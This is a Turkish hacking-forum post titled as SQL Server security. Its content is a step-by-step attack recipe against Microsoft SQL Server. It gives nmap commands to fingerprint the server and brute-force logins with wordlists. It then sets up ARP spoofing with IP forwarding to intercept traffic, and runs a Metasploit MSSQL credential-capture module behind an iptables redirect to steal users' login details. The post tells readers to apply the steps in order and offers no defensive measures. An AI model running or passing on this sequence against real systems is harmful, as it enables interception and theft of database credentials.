Turkhackteam.net/org - Turkish Hacking & Security Platform...  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform... >
Sunucu Yönetimi ve Güvenliği
> Server Güvenlik

Server Güvenlik Linux ve Win server güvenlik

SQL Server’da Güvenlik

Server Güvenlik

Yeni Konu aç Cevapla
 
Seçenekler
Alt 09-10-2017   #1
  • Offline
  • Albay
  • Genel Bilgiler
Üyelik tarihi
Feb 2015
Nereden
TURAN
Mesajlar
Konular


  
Arrow SQL Server’da Güvenlik



Microsoft SQL Server 1433 numaralı port üzerinden çalışır. Bazı yazılımcılar farklı portlar kullanabilirler. Eğer diğer portları bulmak istiyorsanız NMAP‘i(Güvenlik tarayıcısı) kullanabilirsiniz. Örnek verecek olursak;

Kod:
$ nmap -n <“IP”> -p “PORT” (Bu kod ile port üzerindeki server hakkında bilgi alınabilir)

$ nmap -p “PORT” –script ms-sql-info <“IP”> (Detaylı Bilgi Almak için kullanılır)

$ nmap -p <PORT> –script ms-sql-brute –script-args mssql.instance-all,userdb=wordlist.txt,passdb=wordlist.txt <“IP”>  (Ip’deki server’a ait account bilgilerine sahipr olmak gerekmektedir bu şekilde user ve password’e ulaşılabilinir.)

$ echo 1 > /proc/sys/net/ipv4/ip_forward (Ip Yönlendirmesi yapıyoruz, Kali Linux işletim sisteminde bulunan “arpspoof” ile hedef ve sunucu arasına girilmiş oldu. )
Kod:
$ arpspoof -i eth0 -t <SQL SERVER IP> <“Kurban IP”>

$ arpspoof -i eth0 -t <“Saldırı Yapılacak IP”> <“Saldırı Yapılacak IP”>

$ use auxiliary/server/capture/mssql

$ set SRVPORT “PORT”

$ iptables -t nat -A PREROUTING -p tcp -d 192.168.48.130 –dport “PORT” -j REDIRECT –to-ports “PORT” (Saldırılan hesap bilgilerini girdiğinde yazılım hesap bilgilerini yakalayıp bize verecek ve saldırdığımız Server’a kullanıcı giriş yapmak istediğinde Additional Information hatası alacak )
Sırasıyla uygulayınız .

Alıntıdır .
    
Offline
 
Alıntı ile Cevapla
Cevapla

Bookmarks

Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks Kapalı
Pingbacks Kapalı
Refbacks Kapalı


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından açılmaktadır.
Bu konular yönetimimiz tarafından takip edilsede gözden kaçabilen telif hakkı olan veya mahkeme kararı çıkmış konular sitemizde bulunabilir. Bu tür konuları bize turkhackteamiletisim [at] gmail.com adresine mail atarak bildirdiğiniz takdirde en kısa sürede konular hakkında gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com


Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz, bu sitelerin güvenlik açıklarını site sahibine bildirmek için çaba sarfeder.
Turkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Turkhackteam sorumlu değildir. Sitelerinize Turkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2017

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı



Google Links
instagram Takipçi Hilesi

wau

Search Engine Friendly URLs by vBSEO 3.6.0 ©2011, Crawlability, Inc.